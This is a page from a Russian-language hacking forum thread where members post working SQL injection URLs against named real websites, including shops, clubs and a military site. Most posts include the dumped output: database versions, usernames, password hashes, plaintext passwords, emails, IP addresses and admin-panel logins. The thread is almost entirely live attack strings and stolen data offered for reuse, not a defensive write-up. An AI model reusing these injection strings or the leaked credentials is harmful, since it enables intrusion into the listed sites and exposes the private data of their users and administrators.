SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.rmets.org/news/detail.php?ID=-332+union+select+1,2,concat _ws(0x3a,version(),database (),user()),4,5,6,7,8+from+users--
    Database Version : 4.0.27-standard
    Database name : db116118144
    User name : dbo116118144@localhost


    юзвери:

    Code:
    http://www.rmets.org/news/detail.php?ID=-332+union+select+ 1,2,concat(user_id,0x3a,user_name,0x3a,user_hash,0x3a,user_emai l),4,5 ,6,7,8+from+users+limit+0,1--
    админа так и не нашел :( кто найдёт напишите в п\м ...
     
    #7681 f1ng3r, 10 Feb 2009
    Last edited: 10 Feb 2009
  2. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    ============================================================
    http://narrow.parovoz.com/emb/?ID=-2+union+select+1,2
    version() - 5.0.27-log
    database() - gallery
    user() - parovoz@localhost
    ===========================================================
    ========================================================
    http://www.squamlakeschamber.com/display_members.php?id=-3+union+select+version(),2,3,4,5/*
    version() - 4.0.26
    database() - visitsquam_com
    user() - squam@localhost
    ========================================================
    =========================================================
    http://www.marathonskating.com/info.php?ID=-3+union+select+1/*
    version() - 4.1.22-standard
    database() - marathon_marathon
    user() - marathon_ave@localhost
    ============================================================
    ============================================================
    http://www.beagleclub.cz/wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,version(),3,4,5,6,7/*
    version() - 5.0.32-Debian_7etch8-log
    database() - beagleclub_cz
    user() - beagleclub@localhost
    ===========================================================
    ==============================================================
    http://nicolian.com/albom/index.php?start=9&album=-99999+union+select+version()/*
    user() - [email protected]
    version() - 4.0.25-standard-log
    database() - nicolian
    ==============================================================
    ===================================================================
    http://www.costalindacr.com/ficha.php?id=-3+union+select+1,user()
    user() - costalinda@localhost
    version() - 4.1.20
    database() - db_081
    ===================================================================
     
    #7682 warlok, 10 Feb 2009
    Last edited by a moderator: 10 Feb 2009
  3. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    тут компики продают
    Code:
    http://www.oktop.ru/model.php?cat=mfu&art=-brother7427+union+select+1,2,user_name,user_password,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM uvarovka_galllery_users/*
    5-я ветка
    логин пасс админа :: для форума

    ak47-111 admin-111

    интернет магазин квазар
    Code:
    http://www.kvazar.by/index.php?option=com_simplecat&id=-41%20union%20select%20concat_ws(0x3a%20,version(),database(),user()),2,3--
    version::4.1.22
    User::[email protected]
    database::kvazar_by

    Мужики,держитесь за штаны)))) я чуть не упал))
    Code:
    http://www.sochi.microlana.ru/admin.php
    вход без пароля)))...пол часа искал пасс...а он там не нужен....жесть))

    интерет магазин агент 007 :cool:
    Code:
    http://www.007.lviv.ua/vuvid.php?id0=-82%20union%20select%201,2,concat_ws(0x3a%20,version(),database(),user()),4,5,6,7,8,9,10,11,12,13%20%20--
    version::4.1.22-standard-log
    user::[email protected]
    database::uatur_ca
     
    #7683 TELO, 10 Feb 2009
    Last edited by a moderator: 10 Feb 2009
  4. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    MP3Format.ru
    я люблю музыку )


    Gsd.umn.edu
    а так же люблю покушать..)
     
    #7684 sabe, 10 Feb 2009
    Last edited: 11 Feb 2009
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.totaltop.ro/detalii-site.php?site=-28748+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x2F2A2A2F,Version(),Database(),User()),0x71),0x71),6,7,8,9,10/*



    Version: 4.1.11-nt
    Database : totaltop
    User : totaltop@sh3
     
  6. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    Проект Межура
    Code:
    http://kraszem.ru/project.php?id=10+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7--
    user(): [email protected]
    database():kraszem
    version(): 5.0.45
    тИЦ:90

    Code:
    http://kraszem.ru/project.php?id=10+union+select+1,concat(user_id,0x3a,user_login,0x3a,user_password,0x3a,user_hash),3,4,5,6,7+from+users--
    1:///msn:897c8fde25c5cc5270cda61425eed3c8:660212f559fe84b0b13a3d917da18c8a
    2:///qwerty:897c8fde25c5cc5270cda61425eed3c8:b2edaa9bbbc9c8a87b5f5e691e5bcc43

    jokester: не нужно их докручивать, боян есть боян. Если раскрутить все скули из топика, он разрастётся ещё на 1500 страниц
     
    #7686 z00MAN, 10 Feb 2009
    Last edited by a moderator: 10 Feb 2009
  7. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Database Version: 5.0.51a-log
    Database name: db208210290
    User name: [email protected]

    База

    db208210290

    Таблицы

    acsales
    fleet
    fuelprice
    nav
    news
    pages
    ufscard
    users



    Достаём пользователей

    firstname:un:pw:level:ip

    :Brent: bheimer: 0449262361ed354cb870302815f9402f :10:71.230.51.69
    : UFS-Aero : administrator : 1da1fb3f4e4c97f57b319c47fade82f8 :10:205.238.220.154
    :Gareth : gharte: 981d99c1061407bd93f41b5025a4383d :10:71.230.51.69
    :Gregg : gheimer : f63ff11aa5b05cfb84cf81292b0f6ba5 :10:205.238.220.154
    :Glenn: gstewart: ae463243b033f797858668b931591f92 :5:205.238.220.154
    :Jason: jwarren: ab5f90cafb4bd8a13651d78651b89557 :8:205.238.220.154
    :Hoyt: hbangs: 8379c86250c50c0537999a6576e18aa7 :10:66.212.1.106
    :Dustin: dpalmer: d5751883938853085bd88b2dd8bffce5 :10:75.147.80.202
    :Heskel: hburnstein: c00245006b0aa220c36d1657abe1f96f :10:205.238.220.154
    :Ronald: rwatters: 2422c55070091c902595772a114aa672 :2:204.223.176.193
    ::: d41d8cd98f00b204e9800998ecf8427e :0:69.84.207.39
    : obinna kingsley : obi:e43dbc651880164a05a28b09cafc738c :2:80.78.215.77
    : test: none: 334c4a4c42fdb79d7ebc3e73b517e6f8 :2:66.212.1.106
    : Robert: cigarmanbob: e96946e35431ae7293c882f4d0d3398d :2:204.28.140.7
    : Hoyt: hvbangs: 0264e1527230cd1780b58623850ff685 :10:205.238.220.154
    : Michael :mderk: db205babfde4780567e539b178b2da2c :2:75.146.205.221
     
    1 person likes this.
  8. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    blindcanadians.ca - PR6
    Code:
    http://www.blindcanadians.ca/press_releases/index.php?BriefID=-44+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4--
    DB Version: 5.0.67-community
    User : blindcan_blindca@localhost
    DB : blindcan_aebc
    Доступна INFORMATION_SCHEMA...
    В принципе ничего интересного нет в базе, есть немного мыл, и всякая фигня =(
     
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.brm.ro/root/index.php?page=sondaje&op=vote&id=26+and+1=0+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11--




    Version: 5.0.22-community-nt
    Database: :brm
    User : root@localhost



    http://www.brm.ro/root/index.php?page=sondaje&op=vote&id=26+and+1=0+union+select+1,2,3,4,5,group_concat(user,0x3a,password),7,8,9,10,11+from+users--
     
    1 person likes this.
  10. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    шопы...

    -----------------------------------------------------------
    Code:
    http://www.umkstroy.ru/shop.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16--
    версия/бд/юзер:
    Code:
    4.1.22-standard:umkstroy_root@localhost:umkstroy_helposcms
    -----------------------------------------------------------

    The End!
     
    #7690 -m0rgan-, 10 Feb 2009
    Last edited by a moderator: 10 Feb 2009
    1 person likes this.
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.vacanta.net/oferte.php?ID=322+UNION+SELECT+1,2,3,4,5,6,7,8,9,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),11,12/*&menu=0&Oferta=Decada%20Balneara



    Database Version: 4.1.22-log
    Database name: vac
    User name: trip1@localhost
     
  12. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    http://www.tni.mil.id/news.php?cid=INT%27+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*

    version::5.0.22-LOG
    user::TNIMIL@LOCALHOST
    database::TNI
     
  13. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.cliven.ro/news.php?newsID=1+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),3,4,5



    Database Version: 5.0.67-community
    Database name: cliven_cliven
    User name: cliven_office@localhost
     
    1 person likes this.
  14. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    Мир путешествий 5-я ветка
    Code:
    http://worldtravels.dp.ua/news/news_info.php?id=-2005031802%20UNION%20SELECT%201,2,3,passw,login,6,7,8%20%20FROM%20admin%20--
    login-pass h7V4c90-ol11SP83
     
  15. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Можете меня поздравить, моя первая скуля в результате которой оказался в админке =))) (поздравлять через кнопку + шучу)))

    Code:
    http://british-chinchilla.dp.ua/index.php?lang=1&menu_id=-90%20union%20select%20concat_ws(0x3a,login,password,name,email,Icq)%20from%20access_admins--
    
    Админка
    Code:
    http://british-chinchilla.dp.ua/admin/
    Вот: login ,password ,name ,email
    webdesign:4187421:valeria:[email protected]
    PR 4
    ТИц 550

    В админке есть доступ к редактированию страниц html редактор =))
    В запросе есть еще ICQ так что можно потырить мыльников если у кого аська есть нормальная =))
     
    #7695 Assembler, 10 Feb 2009
    Last edited: 10 Feb 2009
    3 people like this.
  16. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    Code:
    http://www.fondazionelibro.it/manifestazioni.php?id=-10+union+select+1,2,3,concat(user(),0x3a,database(),0x3a,version()),5,6,7,8,9,10--
    user(): fondazionelibro@localhost
    database(): fondazionelibro
    version(): 5.0.32-Debian_7etch8-log



    Code:
    http://www.lazerklinika.ru/?module=publications&id=-10+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7--
    user(): kolesni2_root@localhost
    database(): kolesni2_db
    version(): 4.0.27-log



    Agenzia Fiorentina per l'Energia
    Code:
    http://www.firenzenergia.it/primopiano.php?id=-10+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8--
    user(): [email protected]
    database(): Sql125363_1
    version(): 5.0.68-log

    таблица phorum_users
    Code:
    http://www.firenzenergia.it/primopiano.php?id=-10+union+select+1,concat(user_id,0x3a,username,0x3a,password),3,4,5,6,7,8+from+phorum_users+limit+0,1--
    user_id:username:рassword
    1:root:8a6043643c9681a1f6422ea094103431
    2:Francesco Rondoni:fc12e5d66f9d4213ad6b5e2be1c6e2a7
    3:Massimo Pepe:c098ff62d9071d69697b5048c6c1c653
    4:Tiziano:e4dc459dd55759e17f5095169c77fadb



    интернет-магазин спорт товаров
    Code:
    http://sport-tovari.ru/texts/int.php?id=-10+union+select+1,concat(user(),0x3a,version(),0x3a,database())--
    user(): [email protected]
    database(): u10475
    version(): 5.0.67-log
    тИЦ:110

    таблица clients
    Code:
    http://sport-tovari.ru/texts/int.php?id=-10+union+select+1,concat(clientusername,0x3a,clientpassword)+from+clients+limit+0,1--
    clientusername:clientpassword
    samolet:bowling
    sport:tovary
    sub7even:gbpltw
     
    #7696 z00MAN, 10 Feb 2009
    Last edited: 10 Feb 2009
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://romanicriss.org/continut_.php?id=-252+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14&lang=


    Database Version: 5.0.67-community
    Database name: criss_cr1ss
    User name: criss_r0man1@localhost



    http://romanicriss.org/admin/login.php

    username: aurel19
    password: unixunix@@
     
  18. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.cultivarnet.com.br/two.php?flag=informe&id=-13+union+select+1,version(),3,4/*
    5.0.41--log
     
    _________________________
    1 person likes this.
  19. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.atreve-te.pt/inspira-te.php?id=-5+union+select+1,version(),3,4,5,6--
    5.0.67-community-log


    Code:
    http://www.sandrosen.se/te.php?action=prod&id=-101121'+union+select+version(),2/*
    5.0.45-community-nt

    Code:
    http://www.limousin.se/bonlimousin/sidor/linjer/ko.php?id=2092&sid=1&lid=-6+union+select+version()/*
    5.0.32-Debian_7etch8-log

    Code:
    http://www.andhrakaburlu.com/gs.php?id=-92+union+select+1,version(),3,4,5,6/*
    5.0.24a-log

    Code:
    http://www.pjxjz.com/xs.php?id=-140+union+select+1,version()/*
    5.0.27-community-nt

    Code:
    http://www.cplec.com/xs.php?id=-32+union+select+1,version()--
    5.0.27-community-nt
     
    _________________________
    5 people like this.
  20. 0nThaR

    0nThaR New Member

    Joined:
    15 May 2008
    Messages:
    26
    Likes Received:
    4
    Reputations:
    4
    Code:
    http://www.empoweredproducts.com/product_one.php?id=-5+union+select+1,2,3,concat(version(),0x3a,database(),0x3a,user())/*
    5.0.45:gunoil_db:empow@localhost
     
    #7700 0nThaR, 11 Feb 2009
    Last edited by a moderator: 11 Feb 2009
    1 person likes this.
Thread Status:
Not open for further replies.